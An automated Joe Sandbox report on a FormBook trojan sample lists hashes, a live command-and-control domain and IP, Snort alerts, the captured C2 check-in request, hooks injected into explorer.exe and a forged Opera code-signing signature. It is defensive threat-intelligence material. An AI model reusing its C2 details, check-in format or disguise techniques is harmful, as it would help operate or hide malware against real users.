http://www.fontbureau.com/designers#	9thuIDnsFV.exe, 00000001.00000003.341157570.000000000616B000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers8	9thuIDnsFV.exe, 00000001.00000002.429598690.0000000007462000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.338914369.0000000006171000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.453984529.000000000B1A0000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr-c(	9thuIDnsFV.exe, 00000001.00000003.331326853.000000000616B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.fontbureau.com/designers/	9thuIDnsFV.exe, 00000001.00000003.338972632.000000000616B000.00000004.00000001.sdmp, 9thuIDnsFV.exe, 00000001.00000003.338849647.0000000006171000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers5	9thuIDnsFV.exe, 00000001.00000003.339513065.000000000616B000.00000004.00000001.sdmp	false		high
http://survey-smiles.com	wlanext.exe, 00000014.00000002.599683459.0000000003D9F000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comopsz	9thuIDnsFV.exe, 00000001.00000003.334443520.000000000616D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
5.79.68.101	www.driplockerstore.com	Netherlands		60781	LEASEWEB-NL-AMS-01NetherlandsNL	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	452499
Start date:	22.07.2021
Start time:	14:03:16
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	9thuIDnsFV (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/3@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.1% (good quality ratio 0.1%) Quality average: 100% Quality standard deviation: 0%
HCA Information:	Successful, ratio: 100% Number of executed functions: 73 Number of non-executed functions: 151
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.43.139.144, 23.211.6.115, 104.42.151.234, 20.82.209.183, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235, 23.211.4.86, 20.82.210.154 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:04:06	API Interceptor	1x Sleep call for process: 9thuIDnsFV.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LEASEWEB-NL-AMS-01NetherlandsNL	QxnlprRUTx.exe	Get hash	malicious	Browse	81.171.22.7
	YXYFqHRx2m	Get hash	malicious	Browse	31.186.168.14
	F63V4i8eZU.exe	Get hash	malicious	Browse	212.32.237.90
	mn9ju5i1tk.exe	Get hash	malicious	Browse	85.17.167.196
	REPORT_USD65371.35.exe	Get hash	malicious	Browse	81.171.22.6
	aJuocCMPkL.exe	Get hash	malicious	Browse	212.32.237.101
	i	Get hash	malicious	Browse	5.79.83.30
	w5G1Hw8i40.exe	Get hash	malicious	Browse	185.227.110.219
	BRdDIezWwC.exe	Get hash	malicious	Browse	185.227.110.219
	7VGeqwDKdb.exe	Get hash	malicious	Browse	81.171.22.7
	9biD2MXxdb.exe	Get hash	malicious	Browse	185.227.110.219
	O8O8CUUvAF.exe	Get hash	malicious	Browse	185.227.110.219
	22F93B97E4EE74C1AF48CBDCF878A983CBE2FBA7EEFC5.exe	Get hash	malicious	Browse	81.171.31.214
	V39ZNrnB5E.exe	Get hash	malicious	Browse	185.227.110.219
	dLgAVTjufY.exe	Get hash	malicious	Browse	185.227.110.219
	vNiyRd4GcH.exe	Get hash	malicious	Browse	185.227.110.219
	9irkb5Rbn8.exe	Get hash	malicious	Browse	185.227.110.219
	5EHqnAyk4E.exe	Get hash	malicious	Browse	185.227.110.219
	IZNzZi2xvv.exe	Get hash	malicious	Browse	185.227.110.219
	4E825059CDC8C2116FF7737EEAD0E6482A2CBF0A5790D.exe	Get hash	malicious	Browse	185.227.110.219

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9thuIDnsFV.exe.log Download File
Process:	C:\Users\user\Desktop\9thuIDnsFV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1119
Entropy (8bit):	5.356708753875314
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
MD5:	3197B1D4714B56F2A6AC9E83761739AE
SHA1:	3B38010F0DF51C1D4D2C020138202DABB686741D
SHA-256:	40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
SHA-512:	58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe Download File
Process:	C:\Users\user\Desktop\9thuIDnsFV.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	648912
Entropy (8bit):	6.555584592279825
Encrypted:	false
SSDEEP:	12288:6j5EWCz96Q2vEq5GzUf5qvrcL1DCiTal1VPVhIHHZ25x:61EWMkzGUkrcJafVPUHZ2b
MD5:	0E715DB2198FF670F4BF0E88E0E9B547
SHA1:	2DE5030A9261655E5879E4FABA7B5E79D1DD483E
SHA-256:	4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
SHA-512:	8FB7EA121D51C489BAC9D8D6B35E94FC8BC5E5E218DA53AD952326F6C558FA7484E54842B2C6ABBA36C5EC5BB0E6EB51FDAB46B3F98DAEE3569EF8C6EC400BCD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................,........... ........@.. ....................... ............@.................................<...W........(........................................................................... ............... ..H............text........ ...................... ..`.rsrc....(.........................@..@.reloc..............................@..B................x.......H................... ....1...n...........................................0.............-.&(....+.&+.....0..........s....(....t.....-.&+......+.....~......0..%........(.......,.&&...-.&&+.}....+.}....+.....0..\........(.... .U...-.&.s.....-.&&(....~....%-/+.(....+.}....+.&~..........s....%.-.&+......+.o.....0..).........s.....,.&..(....-.+..+..{.....o..........0..$.........(.....-.&.,.+..+..{.....o....&...0.............-.&{.......-.&o....+.&+.&+.*..0.............-.&{.

C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\9thuIDnsFV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.555584592279825
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	9thuIDnsFV.exe
File size:	648912
MD5:	0e715db2198ff670f4bf0e88e0e9b547
SHA1:	2de5030a9261655e5879e4faba7b5e79d1dd483e
SHA256:	4dc8cb12314311a3bf1b1afa5cc5483284fda573f18c15ab0fef18b7b9ef9f98
SHA512:	8fb7ea121d51c489bac9d8d6b35e94fc8bc5e5e218da53ad952326f6c558fa7484e54842b2c6abba36c5ec5bb0e6eb51fdab46b3f98daee3569ef8c6ec400bcd
SSDEEP:	12288:6j5EWCz96Q2vEq5GzUf5qvrcL1DCiTal1VPVhIHHZ25x:61EWMkzGUkrcJafVPUHZ2b
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`.....................,........... ........@.. ....................... ............@................................

File Icon


Icon Hash:	d8aa9a8e96968eb2

Static PE Info

General
Entrypoint:	0x48bb96
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60F89E0F [Wed Jul 21 22:22:07 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	6/16/2019 5:00:00 PM 6/17/2022 5:00:00 AM
Subject Chain	CN=Opera Software AS, O=Opera Software AS, L=Oslo, C=NO, SERIALNUMBER=916 368 127, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=NO
Version:	3
Thumbprint MD5:	E2F151D7231B321A29201726090932EC
Thumbprint SHA-1:	878B0B298671F44FC739C08D826BB22DB1A2A021
Thumbprint SHA-256:	C4F39751F735BA229C002983C0D6BDD4FD92A82FC97C9F5630D85C4CAA820BDA
Serial:	05F4210DB2B283A32FF2AED29FCB68A4

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8bb3c	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8c000	0x12818	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x9ca00	0x1cd0	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x89b9c	0x89c00	False	0.745221755898	zlib compressed data	6.19781720277	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x8c000	0x12818	0x12a00	False	0.266241086409	data	5.91214034297	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa0000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x8c250	0x8a8	data
RT_ICON	0x8caf8	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x8d060	0x94a8	data
RT_ICON	0x96508	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 4294967055
RT_ICON	0x9a730	0x25a8	data
RT_ICON	0x9ccd8	0x10a8	data
RT_ICON	0x9dd80	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x9e1e8	0x68	data
RT_VERSION	0x9e250	0x412	data
RT_MANIFEST	0x9e664	0x1b4	XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright (C) 1999-2014 by Gammadyne Corporation - All Rights Reserved
Assembly Version	44.1.0.0
InternalName	AAXZConsoleApp9.exe
FileVersion	44.1.0.0
CompanyName	Gammadyne Corporation
LegalTrademarks
Comments	Gammadyne Mailer
ProductName	Gammadyne Mailer
ProductVersion	44.1.0.0
FileDescription	Gammadyne Mailer
OriginalFilename	AAXZConsoleApp9.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/22/21-14:06:04.151317	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49756	80	192.168.2.6	5.79.68.101
07/22/21-14:06:04.151317	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49756	80	192.168.2.6	5.79.68.101
07/22/21-14:06:04.151317	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49756	80	192.168.2.6	5.79.68.101

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 14:06:04.089623928 CEST	49756	80	192.168.2.6	5.79.68.101
Jul 22, 2021 14:06:04.143454075 CEST	80	49756	5.79.68.101	192.168.2.6
Jul 22, 2021 14:06:04.148179054 CEST	49756	80	192.168.2.6	5.79.68.101
Jul 22, 2021 14:06:04.151316881 CEST	49756	80	192.168.2.6	5.79.68.101
Jul 22, 2021 14:06:04.204042912 CEST	80	49756	5.79.68.101	192.168.2.6
Jul 22, 2021 14:06:04.422022104 CEST	80	49756	5.79.68.101	192.168.2.6
Jul 22, 2021 14:06:04.422064066 CEST	80	49756	5.79.68.101	192.168.2.6
Jul 22, 2021 14:06:04.423897982 CEST	49756	80	192.168.2.6	5.79.68.101
Jul 22, 2021 14:06:04.838402987 CEST	49756	80	192.168.2.6	5.79.68.101
Jul 22, 2021 14:06:04.893755913 CEST	80	49756	5.79.68.101	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 14:03:59.303673983 CEST	49448	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:03:59.355784893 CEST	53	49448	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:00.052105904 CEST	60342	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:00.111004114 CEST	53	60342	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:00.765125036 CEST	61346	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:00.822240114 CEST	53	61346	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:02.094609976 CEST	51774	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:02.147171974 CEST	53	51774	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:09.431667089 CEST	56023	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:09.481044054 CEST	53	56023	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:10.378149986 CEST	58384	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:10.430361032 CEST	53	58384	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:11.425858974 CEST	60261	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:11.475346088 CEST	53	60261	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:12.473227978 CEST	56061	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:12.522262096 CEST	53	56061	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:13.484980106 CEST	58336	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:13.545129061 CEST	53	58336	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:14.503341913 CEST	53781	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:14.555308104 CEST	53	53781	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:26.808278084 CEST	54064	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:26.857717991 CEST	53	54064	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:28.077316999 CEST	52811	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:28.134593010 CEST	53	52811	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:29.371144056 CEST	55299	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:29.420710087 CEST	53	55299	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:30.351950884 CEST	63745	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:30.410202980 CEST	53	63745	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:31.313930035 CEST	50055	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:31.366473913 CEST	53	50055	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:32.271615982 CEST	61374	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:32.322807074 CEST	53	61374	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:33.220000982 CEST	50339	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:33.277976036 CEST	53	50339	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:34.482686996 CEST	63307	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:34.532984972 CEST	49694	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:34.536429882 CEST	53	63307	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:34.591289997 CEST	53	49694	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:35.406158924 CEST	54982	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:35.458136082 CEST	53	54982	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:51.542419910 CEST	50010	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:51.606914997 CEST	53	50010	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:52.410365105 CEST	63718	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:52.470299006 CEST	53	63718	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:52.915169001 CEST	62116	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:52.981604099 CEST	53	62116	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:53.353132010 CEST	63816	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:53.413219929 CEST	53	63816	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:54.006211996 CEST	55014	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:54.063257933 CEST	53	55014	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:55.116362095 CEST	62208	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:55.176175117 CEST	53	62208	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:56.242101908 CEST	57574	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:56.302273035 CEST	53	57574	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:57.114556074 CEST	51818	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:57.171421051 CEST	53	51818	8.8.8.8	192.168.2.6
Jul 22, 2021 14:04:58.783549070 CEST	56628	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:04:58.841667891 CEST	53	56628	8.8.8.8	192.168.2.6
Jul 22, 2021 14:05:00.270380974 CEST	60778	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:05:00.351170063 CEST	53	60778	8.8.8.8	192.168.2.6
Jul 22, 2021 14:05:01.065941095 CEST	53799	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:05:01.125777960 CEST	53	53799	8.8.8.8	192.168.2.6
Jul 22, 2021 14:05:10.134098053 CEST	54683	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:05:10.191088915 CEST	53	54683	8.8.8.8	192.168.2.6
Jul 22, 2021 14:05:12.012016058 CEST	59329	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:05:12.082309961 CEST	53	59329	8.8.8.8	192.168.2.6
Jul 22, 2021 14:05:14.577866077 CEST	64021	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:05:14.636253119 CEST	53	64021	8.8.8.8	192.168.2.6
Jul 22, 2021 14:05:37.715763092 CEST	56129	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:05:37.779145002 CEST	53	56129	8.8.8.8	192.168.2.6
Jul 22, 2021 14:05:47.433326960 CEST	58177	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:05:47.503354073 CEST	53	58177	8.8.8.8	192.168.2.6
Jul 22, 2021 14:05:51.776977062 CEST	50700	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:05:51.842499971 CEST	53	50700	8.8.8.8	192.168.2.6
Jul 22, 2021 14:06:03.988888025 CEST	54069	53	192.168.2.6	8.8.8.8
Jul 22, 2021 14:06:04.056725025 CEST	53	54069	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 22, 2021 14:06:03.988888025 CEST	192.168.2.6	8.8.8.8	0xe24e	Standard query (0)	www.driplockerstore.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 22, 2021 14:06:04.056725025 CEST	8.8.8.8	192.168.2.6	0xe24e	No error (0)	www.driplockerstore.com		5.79.68.101	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.driplockerstore.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49756	5.79.68.101	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 14:06:04.151316881 CEST	6041	OUT	GET /np0c/?iN=5jalxB&a0DTBtU=a9fK2iRL7rM/iNgaQ8e4NUwl6BbikcR8OekOj0TYIdin2efeiFW0Z5kC5Xa/O1Kzq37GlajMhw== HTTP/1.1 Host: www.driplockerstore.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 22, 2021 14:06:04.422022104 CEST	6041	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Thu, 22 Jul 2021 12:06:04 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=3031d498-eae5-11eb-88ed-6c71e7fd75df; path=/; domain=.driplockerstore.com; expires=Tue, 09 Aug 2089 15:20:11 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xEB
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xEB
GetMessageW	INLINE	0x48 0x8B 0xB8 0x83 0x3E 0xEB
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8B 0xBE 0xEB

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

